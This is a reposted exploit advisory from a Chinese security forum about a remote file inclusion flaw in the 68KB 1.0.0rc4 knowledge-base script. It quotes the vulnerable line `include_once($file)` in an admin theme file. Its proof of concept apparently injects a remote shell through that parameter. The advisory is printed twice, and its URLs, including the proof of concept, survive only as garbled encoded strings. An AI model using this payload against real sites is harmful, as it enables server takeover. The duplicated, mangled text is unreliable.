-
-
[转帖]68KB v1.0.0rc4 Remote File Include Vulnerability
-
发表于: 2010-8-3 22:29 2354
-
=====================================================================
Description:
68KB is an open source PHP MySQL driven knowledge base script. Built with you in mind to make it easy to configure and setup.
Note:
This is the same vuln in other lower version (9b5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3g2^5M7r3I4G2K9i4c8K6i4K6u0r3x3e0p5&6x3o6c8Q4x3V1k6Q4x3U0V1`.
Vendor Not Fix the vulnerability in all folder !!!
=====================================================================
-=[ vuln c0de ]=-
[!] path/themes/admin/default/modules/show.php
<?php include_once($file); ?>
=====================================================================
-=[ P0C ]=-
b4dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9J5c8Y4m8S2N6r3S2Q4x3V1k6@1K9r3g2E0k6i4y4Q4x3V1k6S2k6r3#2A6L8W2)9J5c8X3c8W2k6X3q4#2L8s2c8Q4x3V1k6E0L8$3c8#2L8r3g2K6i4K6u0r3M7$3S2G2N6#2)9J5k6i4m8Z5M7q4)9K6c8X3k6A6L8r3g2Q4x3@1b7`. [inj3ct0r shell]
=========================| -=[ E0F ]=- |=================================
Description:
68KB is an open source PHP MySQL driven knowledge base script. Built with you in mind to make it easy to configure and setup.
Note:
This is the same vuln in other lower version (9b5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3g2^5M7r3I4G2K9i4c8K6i4K6u0r3x3e0p5&6x3o6c8Q4x3V1k6Q4x3U0V1`.
Vendor Not Fix the vulnerability in all folder !!!
=====================================================================
-=[ vuln c0de ]=-
[!] path/themes/admin/default/modules/show.php
<?php include_once($file); ?>
=====================================================================
-=[ P0C ]=-
b4dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9J5c8Y4m8S2N6r3S2Q4x3V1k6@1K9r3g2E0k6i4y4Q4x3V1k6S2k6r3#2A6L8W2)9J5c8X3c8W2k6X3q4#2L8s2c8Q4x3V1k6E0L8$3c8#2L8r3g2K6i4K6u0r3M7$3S2G2N6#2)9J5k6i4m8Z5M7q4)9K6c8X3k6A6L8r3g2Q4x3@1b7`. [inj3ct0r shell]
=========================| -=[ E0F ]=- |=================================
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
他的文章
赞赏
雪币:
留言: